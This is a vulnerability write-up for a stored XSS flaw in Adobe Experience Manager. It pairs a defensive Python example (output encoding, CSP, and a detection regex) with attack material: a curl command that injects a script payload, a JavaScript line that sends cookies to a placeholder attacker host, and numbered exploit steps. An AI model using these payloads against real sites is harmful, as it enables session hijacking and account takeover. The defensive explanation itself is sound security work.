How CVE-2025-47007 Works
Adobe Experience Manager (AEM) versions 6.5.22 and earlier contain a stored cross-site scripting (XSS) vulnerability in form fields. An attacker with a low-privileged account can store a malicious JavaScript payload in one of these fields; when an authenticated user later opens a page that renders the field, the script runs in that user's browser context. The root cause is insufficient input sanitization in the affected components, which lets arbitrary script be injected through crafted HTTP requests, and the issue persists because AEM does not properly encode user-supplied data before rendering it in web views.
DailyCVE Form
Platform: Adobe Experience Manager
Version: ≤6.5.22
Vulnerability: Stored XSS
Severity: Critical
Date: 06/16/2025
Prediction: Patch by 07/15/2025
What Undercode Says
curl -X POST 'http://target/aem/form' -d 'field=<script>alert(1)</script>'
document.location='http://attacker/steal?cookie='+document.cookie
How to Exploit
1. Authenticate with low-privilege account
2. Submit malicious script via vulnerable form
3. Wait for admin to view compromised page
4. Session hijacking via cookie theft
Protection from this CVE
1. Upgrade to AEM 6.5.23 or later
2. Implement Content Security Policy (CSP) headers
3. Sanitize form inputs and encode them on output
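The following is an added illustration, not code from AEM or from this write-up, of the two defensive points above and of the root cause described in the first section: the same stored value rendered once without output encoding (the pattern the CVE describes) and once with HTML-body encoding, plus a nonce-based CSP header and a small triage check that flags stored field values carrying active content. It is plain Python with no AEM dependency; the field value is the payload shown in this post, and the function and field names are assumptions for the example. In AEM itself the equivalent protection is HTL's context-aware escaping or the XSSAPI encoders.

```python
import html
import re
import secrets

# Constructed sample: the payload quoted in this write-up, as it would sit in the
# repository after a low-privileged user submitted it through the form.
STORED_FIELD_VALUE = "<script>alert(1)</script>"

# Detection-only pattern: flags stored values that carry active content so they
# can be reviewed after patching. It is not a substitute for output encoding.
ACTIVE_CONTENT = re.compile(r"<\s*script|javascript\s*:|\bon\w+\s*=", re.IGNORECASE)


def render_unsafe(field_value: str) -> str:
    """Vulnerable pattern: the stored value is concatenated into the page with no
    output encoding, so markup inside the value becomes live markup."""
    return f"<div class='form-field'>{field_value}</div>"


def render_safe(field_value: str) -> str:
    """Hardened pattern: HTML-body encoding turns '<', '>', '&' and quotes into
    entities, so the browser displays the text instead of executing it."""
    return f"<div class='form-field'>{html.escape(field_value, quote=True)}</div>"


def new_nonce() -> str:
    """Fresh per-response nonce for the CSP header (128 bits, URL-safe)."""
    return secrets.token_urlsafe(16)


def csp_header(nonce: str) -> str:
    """Content-Security-Policy value that only runs scripts carrying this nonce;
    an injected inline <script> without the nonce is blocked by the browser."""
    return (
        f"script-src 'nonce-{nonce}' 'strict-dynamic'; "
        "object-src 'none'; base-uri 'none'"
    )


def flag_stored_values(values: dict[str, str]) -> list[str]:
    """Triage helper: names of stored fields whose value contains active-content
    markers. Hypothetical input shape: {field_name: stored_value}."""
    return [name for name, value in values.items() if ACTIVE_CONTENT.search(value)]


def contains_live_script(rendered: str) -> bool:
    """True when rendered HTML still carries a raw <script> tag."""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    nonce = new_nonce()
    print("unsafe :", render_unsafe(STORED_FIELD_VALUE))
    print("safe   :", render_safe(STORED_FIELD_VALUE))
    print("CSP    :", csp_header(nonce))
    # Constructed repository snapshot: one benign field, one holding the payload.
    print("flagged:", flag_stored_values({"title": "Hello", "comment": STORED_FIELD_VALUE}))
```

The encoded rendering and the CSP header are complementary: encoding removes the injection point, while the nonce policy limits the damage if an unencoded path is missed. The triage helper is meant for a one-off sweep of stored form data after upgrading, since the patch stops new injections but does not clean up values already saved.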
Impact
1. Session hijacking
2. Account takeover
3. Privilege escalation
Sources:
Reported By: nvd.nist.gov